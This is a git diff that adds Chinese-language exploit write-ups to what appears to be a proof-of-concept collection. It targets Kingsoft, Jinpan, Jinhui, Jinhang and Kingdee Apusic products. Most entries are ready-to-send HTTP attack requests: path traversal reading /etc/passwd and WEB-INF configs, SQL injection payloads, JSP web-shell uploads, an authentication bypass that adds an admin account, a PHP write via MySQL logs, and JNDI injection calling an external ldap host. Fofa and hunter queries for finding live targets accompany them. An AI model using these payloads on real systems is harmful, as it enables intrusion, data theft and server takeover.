HTTP/1.1 +Host: 192.168.24.3:6868 +Content-Length: 195 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/114.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.24.3:6868 +Referer: http://192.168.24.3:6868/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7 +Connection: close + +{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9- +AE5A","id":"111;set//global//general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f6368656 +36b5f6c6f67696e322e706870;","type":"0"}} +写入php代码 +POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1 +Host: 192.168.24.3:6868 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 +Firefox/114.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 222 +Origin: 
http://192.168.24.3:6868 +Connection: close +Referer: http://192.168.24.3:6868/index.php +{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844- +76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9- +AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":""}}} + +最后get请求rce: +http://192.168.24.3:6868/check_login2.php +``` diff --git a/金山VGM防毒墙downFile存在任意文件读取漏洞.md b/金山VGM防毒墙downFile存在任意文件读取漏洞.md new file mode 100644 index 0000000..fc2b56f --- /dev/null +++ b/金山VGM防毒墙downFile存在任意文件读取漏洞.md @@ -0,0 +1,39 @@ +# 金山 VGM防毒墙downFile存在任意文件读取漏洞 + +# 一、漏洞简介 +金山 VGM防毒墙由金山安全自主研发推出的新一代专业化安全网关产品。采用、多核硬件架构和独特的模块化功能设计理念,金山 VGM防毒墙具有的高性能、高安全、易操作等特性,真正满足用户不断变化的信息安全需求。灵活稳定的架构,金山 VGM防毒墙集成了网络防火墙、状态监测、抗DDoS、防恶意软件、URL过滤、DPI监测等多种安全功能,有效抵御各类病毒和恶意软件对用户网络和业务系统的破坏。金山 VGM防毒墙 downFile.php文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。 + +# 二、影响版本 ++ 金山 VGM防毒墙 + +# 三、资产测绘 ++ fofa`"金山VGM"` ++ 特征 + +![1708142637307-ffd94189-f19f-4c4d-b4c2-eb650c58dd82.png](./img/3pBGTr3_-hUT2U1o/1708142637307-ffd94189-f19f-4c4d-b4c2-eb650c58dd82-317814.png) + +# 四、漏洞复现 +```java +GET /downFile.php?filename=../../../../etc/passwd HTTP/1.1 +Host: +Cookie: PHPSESSID=74hpcfh7p42bll8eabp1v88eq3 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: https://fofa.info/ +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: cross-site +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1708142781340-aa4c634a-95fc-4603-a0ed-f8afbeb0a85c.png](./img/3pBGTr3_-hUT2U1o/1708142781340-aa4c634a-95fc-4603-a0ed-f8afbeb0a85c-047081.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: \ No newline at end of file diff --git a/金山WPS-RCE.md b/金山WPS-RCE.md new file mode 100644 index 0000000..b9d91b5 --- /dev/null 
+++ b/金山WPS-RCE.md @@ -0,0 +1,203 @@ +## 金山WPS RCE + +wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120 +WPS Office 2019 企业版 < 11.8.2.12085 +POC +在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的) +127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn + +漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系 +代码块在底下。(需要原pdf加wechat) +``` + +``` diff --git a/金山终端安全系统V9.0-SQL注入漏洞.md b/金山终端安全系统V9.0-SQL注入漏洞.md new file mode 100644 index 0000000..12542fa --- /dev/null +++ b/金山终端安全系统V9.0-SQL注入漏洞.md @@ -0,0 +1,20 @@ +## 金山终端安全系统V9.0 SQL注入漏洞 + +## fofa查询语法 +``` +app="金山终端安全系统V9.0Web控制台" +title=="用户登录-金山终端安全系统V9.0Web控制台" +``` + +## 影响版本 +金山终端安全系统 V9.0 < V9.SP1.E1008 + +## POC +``` +POST /inter/update_software_info_v2.php HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Host: ip:port +Content-Length: 81 + +type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1 +``` diff --git a/金山终端安全系统V9.0SQL注入漏洞.md b/金山终端安全系统V9.0SQL注入漏洞.md new file mode 100644 index 0000000..3d21a79 --- /dev/null +++ b/金山终端安全系统V9.0SQL注入漏洞.md 
@@ -0,0 +1,34 @@ +# 金山终端安全系统V9.0 SQL注入漏洞 + +### 一、漏洞描述 +金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。 + +### 二、影响版本 +金山终端安全系统V9.0 + +### 三、资产测绘 +app="金山终端安全系统V9.0Web控制台" + +特征: + +![1708655780558-39f26009-21b3-4401-a4dc-5c95b44a6fcd.png](./img/rElhjlKBz286TiEn/1708655780558-39f26009-21b3-4401-a4dc-5c95b44a6fcd-030937.png) + +### 四、漏洞复现 +```plain +POST /inter/update_software_info_v2.php HTTP/1.1 +Content-type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Host: 139.xxx.xxx.xxx:6868 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 80 +Connection: close + +type=-100+UNION+SELECT+1,md5(078674232),1,1,1,1,1,1--&key=&pageCount=0&curPage= +``` + +![1708798065830-b49297cc-2af2-42c5-b632-673baac678c4.png](./img/rElhjlKBz286TiEn/1708798065830-b49297cc-2af2-42c5-b632-673baac678c4-069542.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: \ No newline at end of file diff --git a/金山终端安全系统V9.0任意用户添加漏洞.md b/金山终端安全系统V9.0任意用户添加漏洞.md new file mode 100644 index 0000000..55ed87a --- /dev/null +++ b/金山终端安全系统V9.0任意用户添加漏洞.md 
@@ -0,0 +1,78 @@ +# 金山终端安全系统V9.0任意用户添加漏洞 + +## fofa + +```javascript +title=="用户登录-猎鹰终端安全系统V9.0Web控制台" +app="金山终端安全系统V9.0Web控制台" +``` + +## poc + +首先访问 checklogin.php,设置$_SESSION[‘userName’]。(后续的 Cookie 保持不变) + +```javascript +POST /inter/ajax.php?imd=checklogin HTTP/1.1 +Host: 192.168.20.131:6868 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Origin: http://192.168.20.131:6868 +Connection: close +Referer: http://192.168.20.131:6868/ +Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964 +Content-Type: application/x-www-form-urlencoded +Content-Length: 20 + +uname=login_session_ +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301550929.png) + + 接下来访问 send_verify2email.php 在 redis 中添加一个键值对:(mailTo 符合邮箱格式即可) + +```javascript +POST /inter/ajax.php?imd=send_verify2email HTTP/1.1 +Host: 192.168.20.131:6868 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Origin: http://192.168.20.131:6868 +Connection: close +Referer: http://192.168.20.131:6868/ +Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964 +Content-Type: application/x-www-form-urlencoded +Content-Length: 33 + +mailTo=login_session_@qq.comEmail +``` + +![image-20241230155135464](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301551573.png) + +面两个步骤访问完成之后,即可未授权访问系统的所有功能,接下来通过权限校验,添加一个系统管理员,访问 get_user_login_cmd 文件即可。(userSession 需要设置成 Email,密码为 1qaz@WSX) + +```javascript +POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 +Host: 192.168.20.131:6868 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 
Firefox/103.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest +Content-Length: 285 +Origin: http://192.168.20.131:6868 +Connection: close +Referer: http://192.168.20.131:6868/ +Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964 + +{"add_user_info_cmd":{"userSession":"Email","mode_id":"B666A8CD-2247-2CA8-4F7D-29EB058A27C2","real_name":"","user_name":"hacker","type":"分级管理员","tel":"","mobile":"","corp":"","notice":"","psw":"92d7ddd2a010c59511dc2905b7e14f64","email":"","VHierarchyName":"","orgtype":"1"}} +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552673.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552975.png) + +## 漏洞来源 + +- https://xz.aliyun.com/t/16105 \ No newline at end of file diff --git a/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md b/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md index 7680665..0cd9e79 100644 --- a/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md +++ b/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md 
@@ -1,26 +1,26 @@ # 金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞 -由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 +金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 ## fofa -```yaml +```kotlin body="/Portal/LoginBegin.aspx" ``` ## poc -```yaml -POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1 -Host: -Accept-Encoding: gzip, deflate -Accept: */* -X-Requested-With: XMLHttpRequest -Content-Type: application/x-www-form-urlencoded -Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 - +```javascript +POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1 +Host:127.0.0.1 +User-Agent:Mozilla/4.0(compatible; MSIE 6.0;Windows NT 5.1; SV1;QQDownload732;.NET4.0C;.NET4.0E) +Content-Length:363 +Content-Type: application/x-www-form-urlencoded +X-Requested-With:XMLHttpRequest +Accept-Encoding: gzip, deflate, br +Connection: keep-alive + Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl= ``` -![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407261053940.png) \ No newline at end of file +![9bf0a2e8296781c0d73ecfc9854d1bc0](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410071441284.png) \ No newline at end of file diff --git a/金慧综合管理信息系统LoginBegin存在sql注入漏洞.md b/金慧综合管理信息系统LoginBegin存在sql注入漏洞.md new file mode 100644 index 0000000..bc2607f --- /dev/null +++ b/金慧综合管理信息系统LoginBegin存在sql注入漏洞.md 
@@ -0,0 +1,34 @@ +# 金慧综合管理信息系统LoginBegin存在sql注入漏洞 + +# 一、漏洞简介 +金慧综合管理信息系统LoginBegin存在sql注入漏洞 + +# 二、影响版本 ++ 金慧综合管理信息系统 + +# 三、资产测绘 ++ fofa`app="金慧-综合管理信息系统"` ++ 特征 + +![1721921858962-77717a38-8222-4d54-a644-7eaa5cf8727a.png](./img/s-W9Z5FFLeIkJsE1/1721921858962-77717a38-8222-4d54-a644-7eaa5cf8727a-034732.png) + +# 四、漏洞复现 +```plain +POST /Portal/LoginBegin.aspx HTTP/1.1 +Upgrade-Insecure-Requests: 1 +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Chrome/23.0.1271.64 Safari/537.11 +Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* +Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 +Content-Type: application/x-www-form-urlencoded +Host: + +Todo=Validate&LoginName=beczou'or (select db_name())>0--&Password=admin&CDomain=Local&FromUrl=admin +``` + +![1721921873278-42d20cf4-a157-42ed-9fed-ad044cefe8a1.png](./img/s-W9Z5FFLeIkJsE1/1721921873278-42d20cf4-a157-42ed-9fed-ad044cefe8a1-037486.png) + + + +> 更新: 2024-08-12 17:15:59 +> 原文: \ No newline at end of file diff --git a/金盘图书馆系统doUpload存在任意文件上传漏洞.md b/金盘图书馆系统doUpload存在任意文件上传漏洞.md new file mode 100644 index 0000000..b879a55 --- /dev/null +++ b/金盘图书馆系统doUpload存在任意文件上传漏洞.md 
@@ -0,0 +1,65 @@ +# 金盘图书馆系统doUpload存在任意文件上传漏洞 + +# 一、漏洞简介 +金盘图书馆系统doUpload存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 金盘图书馆系统 + +# 三、资产测绘 ++ hunter`web.body="/opac/opacRssCollect"` ++ 特征 + +![1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47.png](./img/J_6NyNKSVhklsxlG/1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47-740576.png) + +# 四、漏洞复现 +```plain +POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Content-Length: 235 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Content-Type: multipart/form-data; boundary=----xbkdgks1fwucvok84tce +Upgrade-Insecure-Requests: 1 +X-Forwarded-For: 127.0.0.1 +X-Originating-IP: 127.0.0.1 +X-Remote-Addr: 127.0.0.1 +X-Remote-IP: 127.0.0.1 + +------xbkdgks1fwucvok84tce +Content-Disposition: form-data; name="file";filename="tvrodinjqx.jsp" + +<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +------xbkdgks1fwucvok84tce-- +``` + +![1706076044489-305f3cf0-e373-47b5-b0f9-c72f0570d05f.png](./img/J_6NyNKSVhklsxlG/1706076044489-305f3cf0-e373-47b5-b0f9-c72f0570d05f-592253.png) + +上传文件位置 + +```plain +GET /upload/2024-01-24/1706077745930.jsp HTTP/1.1 +Host: 42.247.6.28:9090 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Upgrade-Insecure-Requests: 1 +X-Forwarded-For: 127.0.0.1 +X-Originating-IP: 127.0.0.1 +X-Remote-Addr: 127.0.0.1 +X-Remote-IP: 127.0.0.1 +``` + 
+![1706077840008-2a84e501-4e3c-4484-8b55-93a74b9f3b96.png](./img/J_6NyNKSVhklsxlG/1706077840008-2a84e501-4e3c-4484-8b55-93a74b9f3b96-027567.png) + +[金盘图书馆系统-doupload-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222151277-db0f2eb8-6fd5-4fbe-957a-bab7b52f6727.yaml) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/金盘图书馆系统download存在任意文件下载漏洞.md b/金盘图书馆系统download存在任意文件下载漏洞.md new file mode 100644 index 0000000..0241585 --- /dev/null +++ b/金盘图书馆系统download存在任意文件下载漏洞.md 
@@ -0,0 +1,45 @@ +# 金盘图书馆系统download存在任意文件下载漏洞 + +# 一、漏洞简介 +金盘移动图书馆系统 download.jsp 任意文件下载,攻击者可通过此漏洞获取敏感信息,从而为下一步攻击做准备。 + +# 二、影响版本 ++ 金盘图书馆系统 + +# 三、资产测绘 ++ hunter`web.body="/opac/opacRssCollect"` ++ 特征 + +![1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47.png](./img/x_-unzLuHa8IxmEt/1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47-764235.png) + +# 四、漏洞复现 +```plain +GET /pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=9464BF4CB3C292D28F4239D97F50B1B6 +Upgrade-Insecure-Requests: 1 +``` + +![1706076638335-24a129c0-1c51-4a93-8fd4-b39ec8e865e7.png](./img/x_-unzLuHa8IxmEt/1706076638335-24a129c0-1c51-4a93-8fd4-b39ec8e865e7-583200.png) + +其他文件位置 + +```plain +/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/proxy-config.xml +/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/services-config.xml +/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/remoting-config.xml +/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/messaging-config.xml +/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/data-management-config.xml +/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/lcatalina.properties +/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/application.properties +``` + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/金盘微信管理平台download.jsp任意文件读取漏洞.md b/金盘微信管理平台download.jsp任意文件读取漏洞.md new file mode 100644 index 0000000..2f39074 --- /dev/null +++ b/金盘微信管理平台download.jsp任意文件读取漏洞.md 
@@ -0,0 +1,18 @@ +# 金盘微信管理平台download.jsp任意文件读取漏洞 + +金盘微信管理平台download.jsp任意文件读取漏洞,通过该漏洞读取数据库配置文件等 + +## fofa + +```javascript +title=="微信管理后台" +``` + +## poc + +```javascript +GET /mobile/pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml HTTP/1.1 +Host: +``` + +![image-20241021172734743](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410211727896.png) \ No newline at end of file diff --git a/金盘微信管理平台getsysteminfo接口未授权访问漏洞.md b/金盘微信管理平台getsysteminfo接口未授权访问漏洞.md new file mode 100644 index 0000000..27f2ab1 --- /dev/null +++ b/金盘微信管理平台getsysteminfo接口未授权访问漏洞.md @@ -0,0 +1,38 @@ +# 金盘微信管理平台getsysteminfo接口未授权访问漏洞 + +# 一、漏洞简介 +金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞,攻击者通过漏洞可以获取账号密码信息,获取后台管理员权限。 + +# 二、影响班额本 ++ 金盘微信管理平台<3.3.1 + +# 三、资产测绘 ++ hunter`web.title="微信管理后台"&&web.icon=="0488faca4c19046b94d07c3ee83cf9d6"` ++ 登录页面 + +![1693023434425-63d7794d-540c-4402-93e3-4899a5bbb674.png](./img/xKPjSvbVlNKLE_7U/1693023434425-63d7794d-540c-4402-93e3-4899a5bbb674-617953.png) + +# 四、漏洞复现 +通过`poc`获取账号密码 + +```plain +GET /admin/weichatcfg/getsysteminfo HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1693023522105-e7fe1ee4-d044-4342-890c-14c8186beae2.png](./img/xKPjSvbVlNKLE_7U/1693023522105-e7fe1ee4-d044-4342-890c-14c8186beae2-177823.png) + +通过获取的账号密码登录后台 + +![1693023660033-f14ad2f4-0a68-443f-a419-20be7830cc76.png](./img/xKPjSvbVlNKLE_7U/1693023660033-f14ad2f4-0a68-443f-a419-20be7830cc76-527705.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/金盘移动图书馆系统download.jsp存在任意文件读取漏洞.md b/金盘移动图书馆系统download.jsp存在任意文件读取漏洞.md new file mode 100644 index 0000000..d22522a --- /dev/null 
+++ b/金盘移动图书馆系统download.jsp存在任意文件读取漏洞.md @@ -0,0 +1,25 @@ +# 金盘移动图书馆系统download.jsp存在任意文件读取漏洞 + +金盘移动图书馆系统download.jsp存在任意文件读取漏洞,通过该漏洞读取数据库配置文件等 + +## fofa + +```javascript +app="金盘软件-金盘移动图书馆系统" +``` + +## poc + +```javascript +GET /pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/db/default.properties HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cookie: JSESSIONID=D8C7BD39FAF4DD095FBBB0E87FB017C5 +Connection: close +``` + +![image-20250217101024678](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502171010739.png) \ No newline at end of file diff --git a/金盘移动图书馆系统upload存在任意文件上传漏洞.md b/金盘移动图书馆系统upload存在任意文件上传漏洞.md new file mode 100644 index 0000000..138ef14 --- /dev/null +++ b/金盘移动图书馆系统upload存在任意文件上传漏洞.md 
@@ -0,0 +1,34 @@ +# 金盘移动图书馆系统upload存在任意文件上传漏洞 + +金盘图书馆微信管理平台 /common/upload/upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取权限。 + +## fofa + +```javascript +app="金盘软件-金盘移动图书馆系统" +``` + +## poc + +```javascript +POST /common/upload/upload HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=399e563f0389566bd40fd4d6409a67dd +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cookie: JSESSIONID=D8C7BD39FAF4DD095FBBB0E87FB017C5 +Connection: close +Content-Length: 179 + +--399e563f0389566bd40fd4d6409a67dd +Content-Disposition: form-data; name="file"; filename="aaaaaa.jspx" + +<% out.println("Do You Want?"); %> +--399e563f0389566bd40fd4d6409a67dd-- +``` + +![image-20250217100804857](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502171008957.png) \ No newline at end of file diff --git a/金航网上阅卷系统fileUpload任意文件上传漏洞.md b/金航网上阅卷系统fileUpload任意文件上传漏洞.md new file mode 100644 index 0000000..d7ddfca --- /dev/null +++ b/金航网上阅卷系统fileUpload任意文件上传漏洞.md 
@@ -0,0 +1,40 @@ +# 金航网上阅卷系统fileUpload任意文件上传漏洞 + +衡水金航计算机科技有限公司是一家长期致力于图像标记识别采集技术及信息管理系统的软件企业。金航网上阅卷系统:可以广泛地应用于高考、中考、教育局组织的学校联考、各类学校自组织考试、各种行业考试、职称考试等。衡水金航计算机科技有限公司金航网上阅卷系统 fileUpload 任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +## hunter + +```javascript +web.body="js/insteadSelect/jquery.insteadSelect.css" +``` + +## poc + +```javascript +POST /fileUpload HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 351 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="upload"; filename="poc.jsp" +Content-Type: application/pdf + +<%out.println("1234");%> +--00content0boundary00 +Content-Disposition: form-data; name="uploadContentType" + +pdf +--00content0boundary00 +Content-Disposition: form-data; name="uploadFileName" + +1.jsp +--00content0boundary00-- +``` + +![image-20241107235030738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411072350903.png) + +文件路径:`/upload/poc.jsp` \ No newline at end of file diff --git a/金蝶Apusic应用服务器loadTree-JNDI注入漏洞.md b/金蝶Apusic应用服务器loadTree-JNDI注入漏洞.md new file mode 100644 index 0000000..856bc39 --- /dev/null +++ b/金蝶Apusic应用服务器loadTree-JNDI注入漏洞.md 
@@ -0,0 +1,45 @@ +## 金蝶Apusic应用服务器loadTree JNDI注入漏洞 + +## fofa +``` +app="Apusic应用服务器" +``` + +## poc +``` +POST /appmonitor/protect/jndi/loadTree HTTP/1.1 +host:127.0.0.1 + +jndiName==ldap://地址 + + + +POST /admin/;//protect/jndi/loadTree HTTP/1.1 +host:127.0.0.1 + +jndiName==ldap://地址 + + + +POST /admin/;//protect/datasource/createDataSource HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 +Content-Length: 260 +Accept-Encoding: gzip, deflate, br +Connection: close +Content-Type: application/x-www-form-urlencoded + +name=nobg7&jndiName=ldap://cm38sdn1l3f79d1jb0jgoahe856jrdjkg.oast.site/ahsdhashduqwe&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=nobg7&userName=nobg7&password=nobg7&repassword=nobg7&connectionURL=sdasd&driverClassName=java.lang.String&testCommand= +``` + +![a519acd405e2e60c00108378f8410c8d](https://github.com/wy876/POC/assets/139549762/faa32ae9-f7b0-4a76-9990-74635d28bd2f) + +![1dc3f827f335c01618f9dd9c4b39832b](https://github.com/wy876/POC/assets/139549762/6eff9f3b-df75-4008-b713-db61a32739bd) + +![584c726b09f954433d5c3248ac5c1368](https://github.com/wy876/POC/assets/139549762/dfe99f4f-d6eb-4869-a2f8-59d792d9dac4) + +![02678af9ca19b8ee1104c874943e5f94](https://github.com/wy876/POC/assets/139549762/09aba93a-9c71-4924-9314-28f054ce2fd7) + + 